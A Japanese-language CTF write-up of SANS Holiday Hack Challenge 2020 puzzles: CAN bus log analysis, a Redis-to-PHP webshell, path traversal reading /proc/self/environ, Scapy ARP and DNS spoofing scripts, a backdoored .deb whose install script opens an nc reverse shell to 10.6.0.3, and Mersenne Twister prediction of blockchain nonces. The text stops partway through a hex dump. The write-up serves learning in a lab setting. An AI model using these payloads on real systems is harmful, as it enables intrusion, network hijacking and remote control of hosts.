Welcome to the CAN bus terminal challenge!
In your home folder, there's a CAN bus capture from Santa's sleigh. Some of
the data has been cleaned up, so don't worry - it isn't too noisy. What you
will see is a record of the engine idling up and down. Also in the data are
a LOCK signal, an UNLOCK signal, and one more LOCK. Can you find the UNLOCK?
We'd like to encode another key mechanism.
Find the decimal portion of the timestamp of the UNLOCK code in candump.log
and submit it to ./runtoanswer!  (e.g., if the timestamp is 123456.112233,
please submit 112233)
$ head candump.log  
(1608926660.800530) vcan0 244#0000000116
(1608926660.812774) vcan0 244#00000001D3
(1608926660.826327) vcan0 244#00000001A6
(1608926660.839338) vcan0 244#00000001A3
(1608926660.852786) vcan0 244#00000001B4
(1608926660.866754) vcan0 244#000000018E
(1608926660.879825) vcan0 244#000000015F
(1608926660.892934) vcan0 244#0000000103
(1608926660.904816) vcan0 244#0000000181
(1608926660.920799) vcan0 244#000000015F

UNLOCKコマンドを探して、そのタイムスタンプをruntoanswerファイルを使って送信するっぽい。-

Can-Busについてはよくわからないので、Youtubeでお勉強。

www.youtube.com

どうやらログの#の前の文字はCanのIDのようなので、それに対して#以降のデータを送信して言うる感じっぽい。 探すのはアンロックなので、アンロックを行う対象のCan IDを探せばよい。 ログの内容が多いものは違うと考えられるので、除外してみてみる。

$ cat candump.log | grep -v 244#
(1608926660.970738) vcan0 188#00000000
(1608926661.474018) vcan0 188#00000000
(1608926661.978259) vcan0 188#00000000
(1608926662.478577) vcan0 188#00000000
(1608926662.977733) vcan0 188#00000000
(1608926663.483216) vcan0 188#00000000
(1608926663.989726) vcan0 188#00000000
(1608926664.491259) vcan0 188#00000000
(1608926664.626448) vcan0 19B#000000000000
(1608926664.996093) vcan0 188#00000000
(1608926665.499007) vcan0 188#00000000
(1608926666.009926) vcan0 188#00000000
(1608926666.512371) vcan0 188#00000000
(1608926667.013385) vcan0 188#00000000
(1608926667.520201) vcan0 188#00000000
(1608926668.022800) vcan0 188#00000000
(1608926668.530024) vcan0 188#00000000
(1608926669.036851) vcan0 188#00000000
(1608926669.544057) vcan0 188#00000000
(1608926670.046480) vcan0 188#00000000
(1608926670.550541) vcan0 188#00000000
(1608926671.055065) vcan0 188#00000000
(1608926671.122520) vcan0 19B#00000F000000
(1608926671.558329) vcan0 188#00000000
(1608926672.063221) vcan0 188#00000000
(1608926672.568871) vcan0 188#00000000
(1608926673.072611) vcan0 188#00000000
(1608926673.579853) vcan0 188#00000000
(1608926674.086447) vcan0 188#00000000
(1608926674.092148) vcan0 19B#000000000000
(1608926674.589954) vcan0 188#00000000
(1608926675.099853) vcan0 188#00000000
(1608926675.605010) vcan0 188#00000000
(1608926676.110132) vcan0 188#00000000
(1608926676.617537) vcan0 188#00000000
(1608926677.121567) vcan0 188#00000000
(1608926677.630561) vcan0 188#00000000
(1608926678.141434) vcan0 188#00000000

188も別のものだと思われるが、19B#00000F000000が一つしかないし、アンロックと思われる。

$ ./runtoanswer 122520
Your answer: 122520
Checking....
Your answer is correct!

ということで回答は19B#00000F000000のタイムスタンプ122520

Sleigh CAN-D-Bus

端末問題を終えると、「サンタのそりにいたずらをされたようなのでそれを見つけてほしい。ただソリはサンタしか触れないので、今度君にも触れるようにサンタに頼んでおく。」みたいなことを言われる。

私はサンタになれるので、サンタになってソリを触ってみる。すると下記の画面が表示された。

f:id:kataware8136:20210116211821p:plain
Sleigh CAN-D-Bus

ヒントも読むとブレーキを動かすと、変なコードが含まれる模様。

ブレーキを18に設定すると、080#000012(16進での18)以外に080#FFFFFDという用途のわからないデータが送られているのがわかる。

これを取り除けばよさそう。

080 Contains FFFFFとしたような記憶があるが、この記事を書いてる途中で試してみても特にクリアとかのメッセージが出なかったので、再確認できなかったし、自分のメモにも残っていなかった。不覚......

8) Broken Tag Generator

Difficulty: 🎄🎄🎄🎄
Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

Tag Generatorで使われている環境変数GREETZを見つけろという内容。ただその前にHolly Evergreenのもとへ行くとヒントがもらえるということで、端末問題を解きに行く

Redis Bug Hunt

Holly EvergreenのすぐそばにあるRedis Bug Hunt端末をクリアするとヒントがもらえそうなので解いていく。 index.phpの内容を表示させればよいっぽい。

We need your help!!
The server stopped working, all that's left is the maintenance port.
To access it, run:
curl http://localhost/maintenance.php
We're pretty sure the bug is in the index page. Can you somehow use the
maintenance page to view the source code for the index page?

$ curl http://localhost/maintenance.php
ERROR: 'cmd' argument required (use commas to separate commands); eg:
curl http://localhost/maintenance.php?cmd=help
curl http://localhost/maintenance.php?cmd=mget,example1

いろいろわからなかったが、ペンテストっぽい内容と思い、ペンテストでRedis周りの攻撃方法ってないかなと思ったら見つかる。 そのページ紹介しようと思ったが、そのページ内のリンクから、サポート詐欺系に飛ばされるリンクがあったので、念のため載せておかないです。

まぁそれっぽいキーワードで検索すると見つかるので注意。 maintenance.phpを使ってPHPのWebshellを送り込んで実行してあげればよい。 多分コンソールに出力されるのがクリアの条件のようなので、最後に出力したファイルを表示させてクリア

$ curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html
$ curl http://localhost/maintenance.php?cmd=config,set,dbfilename,web.php
$ curl http://localhost/maintenance.php?cmd=set,test,"%3C?php%20system(%24_GET%5B%22cmd%22%5D);%20?%3E"
$ curl http://localhost/maintenance.php?cmd=save
$ curl http://localhost/web.php?cmd=cat%20index.php --output out.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   680  100   680    0     0   132k      0 --:--:-- --:--:-- --:--:--  132k
$ cat out.txt 
REDIS0009�      redis-ver5.0.3�
�edis-bits�@�ctime�^�`�used-mem
 aof-preamble���example2#We think there's a bug in index.phptest<?php
# We found the bug!!
#
#         \   /
#         .\-/.
#     /\ ()   ()
#       \/~---~\.-~^-.
# .-~^-./   |   \---.
#      {    |    }   \
#    .-~\   |   /~-.
#   /    \  A  /    \
#         \/ \/
# 
echo "Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figur
e out what's going on"
?>
example1The site is in maintenance mode�z׾� �

Broken Tag Generator

画像を送信したりして、オリジナルタグを作ることができそうなサービスの環境変数を見つける。 サービスにアクセスすると下記の画面が表示される

f:id:kataware8136:20210117123530p:plain
Tag-Generator

ここからはBurp Suiteを使って解いていく。

Select fileで自分のローカルのファイルのアップロードが可能。ここでphpinfoのファイルをアップロードしようとすると、エラー画面が表示される

app/lib/app.rbでエラーが出力されることがわかる。

f:id:kataware8136:20210117124149p:plain

逆に画像ファイルをアップロードすると、レスポンスにリソースidっぽいものが確認できる。

ここで、JavaScriptを見てみると、アップロードした画像はimage?id={}という形式で取得していることがわかる。

ここにLFIを試してみる。

https://tag-generator.kringlecastle.com/image?id=../../../../app/lib/app.rbというリクエストを送る。Web画面上はエラーが表示されるだけだがBurpのレスポンスを見るとソースコードが出力されている。

しかし、目標はソースコードではなく、環境変数である。ソースコードにはそれっぽいことはなかった。

またいろいろ悩むが、プロセスの環境変数/proc/{PID}/environで知ることができるらしい。ということでLFIで試してみる。

https://tag-generator.kringlecastle.com/image?id=../../../proc/self/environを送るとGREETZ=JackFrostWasHereと返ってくる。これが答え

9) ARP Shenanigans

個人的に一番楽しかった問題。

Difficulty: 🎄🎄🎄🎄
Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Alabaster Snowballの近くに行くとScapy PrepperARP shenanigansがあり、前の問題とかと同じように、端末問題がメイン問題のヒントとなっている構成。

まずはScapy Prepperを解いていく

Scapy Prepper

これは、scapyというパケット作成するPythonのライブラリに関する問題のよう。task.get()でタスクを入手し、task.sbumit()を使って送信していく。

リファレンス等を参照しながらひたすら問題にこたえていく。この問題に関してはヒントももらえるので、解答だけずらっと書きます。 実際はいろいろ調べながらやりました。

>>> task.get()
Welcome to the "Present Packet Prepper" interface! The North Pole could use your help preparing present pack
ets for shipment.
Start by running the task.submit() function passing in a string argument of 'start'.
Type task.help() for help on this question.
>>>  task.submit('start')
Correct! adding a () to a function or class will execute it. Ex - FunctionExecuted()
Submit the class object of the scapy module that sends packets at layer 3 of the OSI model.
>>>  task.submit(send)
Correct! The "send" scapy class will send a crafted scapy packet out of a network interface.
Submit the class object of the scapy module that sniffs network packets and returns those packets in a list.
>>>  task.submit(scapy.sendrecv.sniff)
Correct! the "sniff" scapy class will sniff network traffic and return these packets in a list.
Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the 
first sniffed response packet to be stored in a variable named "pkt":
1. pkt = sr1(IP(dst="127.0.0.1")/TCP(dport=20))
2. pkt = sniff(IP(dst="127.0.0.1")/TCP(dport=20))
3. pkt = sendp(IP(dst="127.0.0.1")/TCP(dport=20))
>>>  task.submit(1)
Correct! sr1 will send a packet, then immediately sniff for a response packet.
Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets.
>>>  task.submit(scapy.utils.rdpcap)
Correct! the "rdpcap" scapy class can read pcap files.
The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that 
correctly prints a summary of UDP_PACKETS:
1. UDP_PACKETS.print()
2. UDP_PACKETS.show()
3. UDP_PACKETS.list()
>>>  task.submit(2)
Correct! .show() can be used on lists of packets AND on an individual packet.
Submit only the first packet found in UDP_PACKETS.
>>> task.submit(UDP_PACKETS[0])
Correct! Scapy packet lists work just like regular python lists so packets can be accessed by their position
 in the list starting at offset 0.
Submit only the entire TCP layer of the second packet in TCP_PACKETS.
>>> task.submit(TCP_PACKETS[1].getlayer(TCP))
Correct! Most of the major fields like Ether, IP, TCP, UDP, ICMP, DNS, DNSQR, DNSRR, Raw, etc... can be acce
ssed this way. Ex - pkt[IP][TCP]
Change the source IP address of the first packet found in UDP_PACKETS to 127.0.0.1 and then submit this modi
fied packet
>>> pkt = UDP_PACKETS[0]
>>> pkt[IP].src = "127.0.0.1"
>>> task.submit(pkt)
Correct! You can change ALL scapy packet attributes using this method.
Submit the password "task.submit('elf_password')" of the user alabaster as found in the packet list TCP_PACK
ETS.
>>> task.submit('echo')
Correct! Here is some really nice list comprehension that will grab all the raw payloads from tcp packets:
[pkt[Raw].load for pkt in TCP_PACKETS if Raw in pkt]
The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. S
ubmit only the ICMP chksum value from the second packet in the ICMP_PACKETS list.
>>> task.submit(ICMP_PACKETS[1][ICMP].chksum)
Correct! You can access the ICMP chksum value from the second packet using ICMP_PACKETS[1][ICMP].chksum .
Submit the number of the choice below that would correctly create a ICMP echo request packet with a destinat
ion IP of 127.0.0.1 stored in the variable named "pkt"
1. pkt = Ether(src='127.0.0.1')/ICMP(type="echo-request")
2. pkt = IP(src='127.0.0.1')/ICMP(type="echo-reply")
3. pkt = IP(dst='127.0.0.1')/ICMP(type="echo-request")
>>> task.submit(3)
Correct! Once you assign the packet to a variable named "pkt" you can then use that variable to send or mani
pulate your created packet.
Create and then submit a UDP packet with a dport of 5000 and a dst IP of 127.127.127.127. (all other packet 
attributes can be unspecified)
>>> pkt = IP(dst='127.127.127.127')/UDP(dport=5000)
>>> task.submit(pkt)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.127.127.127")/UDP(dport=5000)
task.submit(pkt)
Create and then submit a UDP packet with a dport of 53, a dst IP of 127.2.3.4, and is a DNS query with a qna
me of "elveslove.santa". (all other packet attributes can be unspecified)
>>> pkt1 = IP(dst='127.2.3.4')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname= "elveslove.santa"))
>>> task.submit(pkt1)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.2.3.4")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="elveslove.santa"))
task.submit(pkt)
The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) 
has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP respons
e and then task.submit(ARP_PACKETS) for inspection.
>>> ARP_PACKETS[1][ARP].hwsrc = "00:13:46:0b:22:ba"
>>> ARP_PACKETS[1][ARP].hwdst = "00:16:ce:6e:8b:24"
>>> ARP_PACKETS[1][ARP].op = 2
>>> task.submit(ARP_PACKETS)
Great, you prepared all the present packets!
Congratulations, all pretty present packets properly prepared for processing!

ARP Shenanigans

本番問題。起動するとメッセージが表示される。HELP.mdを見ると使い方を教えてくれる。

Jack Frost has hijacked the host at 10.6.6.35 with some custom malware.
Help the North Pole by getting command line access back to this host.
Read the HELP.md file for information to help you in this endeavor.
Note: The terminal lifetime expires after 30 or more minutes so be 
sure to copy off any essential work you have done as you go.
# How To Resize and Switch Terminal Panes:
You can use the key combinations ( Ctrl+B ↑ or ↓ ) to resize the terminals.
You can use the key combinations ( Ctrl+B o ) to switch terminal panes.
See tmuxcheatsheet.com for more details
# To Add An Additional Terminal Pane:
`/usr/bin/tmux split-window -hb`
# To exit a terminal pane simply type:
`exit`
# To Launch a webserver to serve-up files/folder in a local directory:

cd /my/directory/with/files
python3 -m http.server 80

# A Sample ARP pcap can be viewed at:
https://www.cloudshark.org/captures/d97c5b81b057
# A Sample DNS pcap can be viewed at:
https://www.cloudshark.org/captures/0320b9b57d35
# If Reading arp.pcap with tcpdump or tshark be sure to disable name
# resolution or it will stall when reading:

tshark -nnr arp.pcap
tcpdump -nnr arp.pcap

先にこの問題を解説すると、下記の流れである。 * tcpdumpをするとARPリクエストが飛んでくるので、arpリクエストを返す。 * arpリクエストを返すと、DNSリクエストが飛んでくるのでDNSを自分のホストになるように返す。 * DNSリクエストを返すと、ftpの通信でdebファイルを取得しようとしてくる。 * 細工したdebファイルを用意して、リバースシェルを張る

実際の時はそれぞれを試した結果、変化があったのでそれに対応するリクエストを返すものを作った。 ということでこの先はそのようなリクエストを返すファイル作成である。

まずはarpのレスポンス、macaddressとプライベートIPはきどうするたび変わるので適宜直す必要がある。

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
def handle_arp_packets(packet):
    # if arp request, then we need to fill this out to send back our mac as the response
    if ARP in packet and packet[ARP].op == 1:
        ether_resp = Ether(dst="4c:24:57:ab:ed:84", type=0x806, src="02:42:0a:06:00:03")
        arp_response = ARP(pdst="10.6.6.35")
        arp_response.op = 2
        arp_response.plen = 4
        arp_response.hwlen = 6
        arp_response.ptype = 0x800
        arp_response.hwtype = 0x1
        arp_response.hwsrc = "02:42:0a:06:00:03"
        arp_response.psrc = "10.6.6.53"
        arp_response.hwdst = "4c:24:57:ab:ed:84"
        arp_response.pdst = "10.6.6.35"
        response = ether_resp/arp_response
        sendp(response, iface="eth0")
def main():
    # We only want arp requests
    berkeley_packet_filter = "(arp[6:2] = 1)"
    # sniffing for one packet that will be sent to a function, while storing none
    sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)
if __name__ == "__main__":
    main()

DNSレスポンス

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53"
def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    org_ip = packet[IP]
    org_udp = packet[UDP]
    org_dns = packet[DNS]
    eth = Ether(src="02:42:0a:06:00:03", dst="4c:24:57:ab:ed:84")   # need to replace mac addresses
    ip  = IP(dst=org_ip.src, src=org_ip.dst)                          # need to replace IP addresses
    udp = UDP(dport=org_udp.dport, sport=53)                             # need to replace ports
    dns = DNS(
        # MISSING DNS RESPONSE LAYER VALUES 
        id=org_dns.id,ancount=1,qr=1,qd=org_dns.qd,an=DNSRR(rrname=org_dns.qd.qname, type='A',rdata="10.6.0.3")
    )
    dns_response = eth / ip / udp / dns
    sendp(dns_response, iface="eth0")
def main():
    berkeley_packet_filter = " and ".join( [
        "udp dst port 53",                              # dns
        "udp[10] & 0x80 = 0",                           # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),    # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)             # our macaddress since we spoofed the ip to our mac
    ] )
    # sniff the eth0 int without storing packets in memory and stopping after one dns request
    sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":
    main()

debファイルを改ざんして、リバースシェルを張る。 これはヒントにあったサイトを参考にして作る ヒント先では、msfvenomを使ってペイロードを作成しているが、今回はリバースシェルを張れればいいので、改ざんする.debファイルはncのファイル。そしてncでリバースシェルを仕込むように変更する。

#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    update-alternatives \
        --install /bin/nc nc /bin/nc.traditional 10 \
        --slave /bin/netcat netcat /bin/nc.traditional \
        --slave /usr/share/man/man1/nc.1.gz nc.1.gz \
                /usr/share/man/man1/nc.traditional.1.gz \
        --slave /usr/share/man/man1/netcat.1.gz netcat.1.gz \
                /usr/share/man/man1/nc.traditional.1.gz
fi
nc 10.6.0.3 4444 -e /bin/bash

ここまで用意したら.debファイルを作成し、リクエストに合うようにフォルダを構成してあげる。そしてnc -lpv 4444で待ち受ければよい。

適切に実行できるとリバースシェルが接続できる。問題は/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txtファイルの中から投票を拒否した人を探せばよい。 catコマンドで見てみる。

Tanta Kringle recusedという内容があるので答えはTanta Kringle

NORTH POLE                                                                                                                     │
LAND USE BOARD                                                                                                                 │
MEETING MINUTES                                                                                                                │
                                                                                                                               │
January 20, 2020                                                                                                               │
                                                                                                                               │
Meeting Location: All gathered in North Pole Municipal Building, 1 Santa Claus Ln, North Pole                                  │
                                                                                                                               │
Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.                                                    
Chairman Frost made the required announcement concerning the Open Public Meetings Act: Adequate notice of this meeting has been│
 made -- displayed on the bulletin board next to the Pole, listed on the North Pole community website, and published in the Nor│
th Pole Times newspaper -- for people who are interested in this meeting.                                                      │
                                                                                                                               │
Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner. Second – Superman.  Minutes approved.                │
                                                                                                                               │
OLD BUSINESS: No Old Business.                                                                                                 │
                                                                                                                               │
RESOLUTIONS:                                                                                                                   │
The board took up final discussions of the plans presented last year for the expansion of Santa’s Castle to include new courtya│
rd, additional floors, elevator, roughly tripling the size of the current castle.  Architect Ms. Pepper reviewed the planned ch│
anges and engineering reports. Chairman Frost noted, “These changes will put a heavy toll on the infrastructure of the North Po│
le.”  Mr. Krampus replied, “The infrastructure has already been expanded to handle it quite easily.”  Chairman Frost then noted│
, “But the additional traffic will be a burden on local residents.”  Dolly explained traffic projections were all in alignment │
with existing roadways.  Chairman Frost then exclaimed, “But with all the attention focused on Santa and his castle, how will p│
eople ever come to refer to the North Pole as ‘The Frostiest Place on Earth?’”  Mr. In-the-Box pointed out that new tourist-fri│
endly taglines are always under consideration by the North Pole Chamber of Commerce, and are not a matter for this Board.  Mrs.│
 Nature made a motion to approve.  Seconded by Mr. Cornelius.  Tanta Kringle recused herself from the vote given her adoption o│
f Kris Kringle as a son early in his life.                                                                                     │
                                                                                                                               │
Approved:                                                                                                                      │
Mother Nature                                                                                                                  │
Superman                                                                                                                       │
Clarice                                                                                                                        │
Yukon Cornelius                                                                                                                │
Ginger Breaddie                                                                                                                │
King Moonracer                                                                                                                 │
Mrs. Donner                                                                                                                    │
Charlie In the Box                                                                                                             │
Krampus                                                                                                                        │
Dolly                                                                                                                          │
Snow Miser                                                                                                                     │
Alabaster Snowball                                                                                                             │
Queen of the Winter Spirits                                                                                                    │
                                                                                                                               │
Opposed:                                                                                                                       │
                Jack Frost                                                                                                     │
                                                                                                                               │
Resolution carries.  Construction approved.                                                                                    │
                                                                                                                               │
NEW BUSINESS:                                                                                                                  │
                                                                                                                               │
Father Time Castle, new oversized furnace to be installed by Heat Miser Furnace, Inc.  Mr. H. Miser described the plan for inst│
alling new furnace to replace the faltering one in Mr. Time’s 20,000 sq ft castle. Ms. G. Breaddie pointed out that the propose│
d new furnace is 900,000,000 BTUs, a figure she considers “incredibly high for a building that size, likely two orders of magni│
tude too high.  Why, it might burn the whole North Pole down!”  Mr. H. Miser replied with a laugh, “That’s the whole point!”  T│
he board voted unanimously to reject the initial proposal, recommending that Mr. Miser devise a more realistic and safe plan fo│
r Mr. Time’s castle heating system.                                                                                            │
                                                                                                                               │
                                                                                                                               │
Motion to adjourn – So moved, Krampus.  Second – Clarice. All in favor – aye. None opposed, although Chairman Frost made anothe│
r note of his strong disagreement with the approval of the Kringle Castle expansion plan.  Meeting adjourned.

10) Defeat Fingerprint Sensor

Difficulty: 🎄🎄🎄
Bypass the Santavator fingerprint sensor. Enter Santa's office without Santa's fingerprint.

Santavatorのサンタの部屋に入るための指紋認証を突破せよとのこと。これはサンタになれるので、サンタの時とサンタじゃないときのリクエストを見比べれば答えがわかりそう。

サンタの時と、サンタじゃないときではリクエストが微妙に違い、besantaというパラメータを持っていた。

あとはiframeで読み込んでいる部分にbesantaと加えてからクリックすればOK。

11a) Naughty/Nice List with Blockchain Investigation Part 1

Difficulty: 🎄🎄🎄🎄🎄
Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)

10の問題でサンタの状態でサンタの部屋に入ると、Naughty/Niceリストのデータファイルが手に入る(ファイル名はblockhain.dat)

このブロックチェーンのデータに関する問題。まぁその前にTangle Coalboxのもとへ行くとヒントがあるというので、端末問題を解きに行く。

Snowball Fight

自分と相手がフィールドの中に的を持っており先に当てたら勝利というゲーム。 easyは適当にやって勝てるが、Impossibleは相手が外すことはないので、先手のこちらが外してはダメという感じ。

f:id:kataware8136:20210117152200p:plain
snowball fight

Impossibleモードのソースコードを確認すると大量の数字が発見できる。 ヒントからPythonのランダムモジュールを使ってることがわかるので、メルセンヌツイスタで生成。表示される大量の数字は内部状態生成のためと考えられる。

<!--
    Seeds attempted:
    
    646982050 - Not random enough
    860190093 - Not random enough
    2195852736 - Not random enough
    2563904612 - Not random enough
    729049201 - Not random enough
    2470307167 - Not random enough
    463691275 - Not random enough
    3638917918 - Not random enough
    518057808 - Not random enough

メルセンヌツイスタの予測に関しては、ももいろテクノロジーさんがやり方を書いてあったなと思い。参考にしながら作成。

inaz2.hatenablog.com

Impossibleのゲーム盤面のシードがわかったら、難易度easyの名前を見つけたシードにして表示させると同じ盤面が表示される。

あとはeasyでクリアした後に、Impossibleで間違えないようにあてていけばクリア

11a問題

ブロックチェインは129996まである、130000のnonceを予測せよという問題。

Snowball FIghtをクリアするとヒントからOfficialNaughtyNiceBlockchainEducationPack.zipをもらえる

blockhain.datをパースするためのスクリプトnaughty_nice.pyが渡される。これを使うとnonceがわかる。

このnonceは64bitなので、注意して予測する必要がある。 またメルセンヌツイスタの内部状態は624でリセットされる、今回は64bitなので312回で切り替わることに注意してコードを書く。

def untemper(x):
    x = unBitshiftRightXor(x, 18)
    x = unBitshiftLeftXor(x, 15, 0xefc60000)
    x = unBitshiftLeftXor(x, 7, 0x9d2c5680)
    x = unBitshiftRightXor(x, 11)
    return x

def unBitshiftRightXor(x, shift):
    i = 1
    y = x
    while i * shift < 32:
        z = y >> shift
        y = x ^ z
        i += 1
    return y

def unBitshiftLeftXor(x, shift, mask):
    i = 1
    y = x
    while i * shift < 32:
        z = y << shift
        y = x ^ (z & mask)
        i += 1
    return y

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    count = c1.load_chain()
    value1 = [0 for i in range(312)]
    index=0
    for i in range(count+1):
        if i == 1248:
            break
        if index < 312:
            value1[index] = c1.blocks[i].nonce
            index += 1
            if index == 312:
                index = 0
    mt_state = []
    print(count)
    for x in value1:
        mt_state.append(untemper(x & 0xffffffff))
        mt_state.append(untemper(x >> 32))
    mt_state.append(624)
    random.setstate((3,tuple(mt_state),None))
    predicted1 = [random.getrandbits(64) for i in range(305)]
    print("predicted")
    print(hex(predicted1[305]))

出力される0x57066318f32f729dが答え

11b) Naughty/Nice List with Blockchain Investigation Part 2

Difficulty: 🎄🎄🎄🎄🎄
The SHA256 of Jack's altered block is: 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f. If you're clever, you can recreate the original version of that block by changing the values of only 4 bytes. Once you've recreated the original block, what is the SHA256 of that block?

Jack Frostがブロックチェーンの一部を変更した、4バイト修正して、元のブロックのSHA256を答えよという問題。

まずはJackが変更したブロックを見つける。空白があるが、空白をつなげたSHA256のハッシュ。

import hashlib

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    count = c1.load_chain()
    value1 = [0 for i in range(312)]
    index=0
    for i in range(count):
        if hashlib.sha256(c1.blocks[i].block_data_signed()).hexdigest() == "58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f":
            print(i)
            break

----
出力
1011
Chain Index: 129459
              Nonce: a9447e5771c704f4
                PID: 0000000000012fd1
                RID: 000000000000020f
     Document Count: 2
              Score: ffffffff (4294967295)
               Sign: 1 (Nice)
         Data item: 1
               Data Type: ff (Binary blob)
             Data Length: 0000006c
                    Data: b'ea465340303a6079d3df2762be68467c27f046d3a7ff4e92dfe1def7407f2a7b73e1b759b8b919451e37518d22d987296fcb0f188dd60388bf20350f2a91c29d0348614dc0bceef2bcadd4cc3f251ba8f9fbaf171a06df1e1fd8649396ab86f9d5118cc8d8204b4ffe8d8f09'
         Data item: 2
               Data Type: 05 (PDF)
             Data Length: 00009f57
                    Data: b'255044462d312e330a2525c1cec7c5210a0a312030206f626a0a3c3c2f547970652f436174616c6f672f5f476f5f417761792f53616e74612f506167657320322030205220202020202030f9d9bf578e3caae50d788fe760f31d64afaa1ea1f2a13d63753e1aa5bf80624fc346bfd667caf7499591c40201edab03b9ef95991c5b499f86dc8539859099ad54b01e733fe5a7a489b93295ff5468034d497938e8f9b8cb3ac3cf50f01b325b9b17747595422b7378f02502e1a9b0ac8528017a9e0a3e3e0a656e646f626a0a0a322030206f626a0a3c3c2f547970652f50616765732f436f756e7420312f4b6964735b3233203020525d3e3e0a656e646f626a0a0a332030206f626a0a3c3c2f547970652f50616765732f436f756e7420312f4b6964735b3135203020525d3e3e0a656e646f626a0a0a342030206f626a0a3c3c2f4c656e67746820323234332f46696c7465722f466c6174654465636f64653e3e0a73747265616d0a789c9d59c98ae44610bdf757d4d9d0e55c9429090a816a3bf86668f061f0cd0bf860b02ffe7dc79e9152b5da78869eaa96728988f7e245644e38c7d33f6f7f9dc2299c439a4e35c6f33cc6d338f3e7dfbfbefdf4dde94f1e017ffffefdedfaf156ea1986a6f15c4e1fbf9cbe7fc6534ca78fdf2e212e1f7fbc3d3ede7edc4ca8e99cfc84c413bee18c740929e4e51d3e07fca52cefe512ea122ff2740c133e9fc30a03af4b8117377878879f070d48e129836280e9f0849f8f31f292734cb85c5dde2b3ecdf84b8a037cf08b31167a95973ce3463c9d761d69985a063b547c17e3f23ea265f4c80c1c61a751b781efbc027c99d5155e2dc5951d143be1c108de8d6200be8a571e91606d8bc7ca765cc50fb29d2c105778df043fcf302f93194babc0979b580da15b7efef8e115520c6dcce7718bd48acee1a2f72586e92276b11560fe4c203c0101d90c86e54c2ec6702193081a816914a8c4440d840c8195dd7c7ad310e8b00c1cadcd600801079fc2f65cdea78bb1850c9823fce1dd3a20e81316c5e80966e2678333d95264ce13e6a70078a51e06c31c0657e42079cadb39aec631de3d309fc5793347763984b1ccf379dec228cb9019c4930d49e86172cc1ccce0199e0f644d47c310bb68353421c4b3997fd73cae964f83bcba32d16f1dfe6c072eacab71fc664b12da3d45e01e031e1bc13c929afd23807e8db04982d8458d01cdb698b043af55e3b50e58a066f255f74fc7c04c1574f70818af139ad55dcce897042ead8e474c1893135da4091dcfde0ef7a9859b09370eb090cf8ed35e8f607b61b4660d440a689db208f698fa108381884ca1afa93633b21306c44a76bcb289ad60b874475148a93aec5cada8b6dff855f68ce99cb720ed53d92bfe93f8b60b96209b4c32956054d3248dd47309218d8837fcfb99952907609133d3ca70faa40cb35f65dad5edfcc9841ccaa90c83168368711858ff428520324bb07c923f153c4af8cb8df00b77cc3688053cc3f84c18fb18724c91b12d9117a385569a15b907a039f47b85f1f4be861a27d98e569ae903e8760865c89b187dbb406a6510ed1b536f625b575ef486d015d9e12eba8685c4bc8a1a805527a3b16c772c667700298c161e5a17c3c0332aa54866c76fce19591d5b00d99d160ff129a3e18d465cde3c168b315b1d38ff1a1210fa27215421e2fc5d96ba492949ba1e7c47ef330caabc1ad99382eda72e7054126f8666576f753e046598e60d0fbf5d9a49d1ac489116231fd04dc03fb38423d9b0502a7fd4e8892924718334118a6017202b0ba2344a9ab9dc31f0c6118e65f1e0330779f852606ba1b0b722f9ad9a1912e6ccc2d791be5fd79938da3cf35c23f4e0b68fc2cce81789c044fd0891bbb938e3dacd192198cc577e3cb8aadb9e381c2439c35aab8617a02de2daf05f401ecb5e3c98ebc0768b904b78a4792ac78b0e9396cf2e9d3b00256093348018d963d654eeb9b86b683923a0b8bc91e8abccb1d1b2435d8a09531f44d21b02aa529558e9736cf4921cb2c53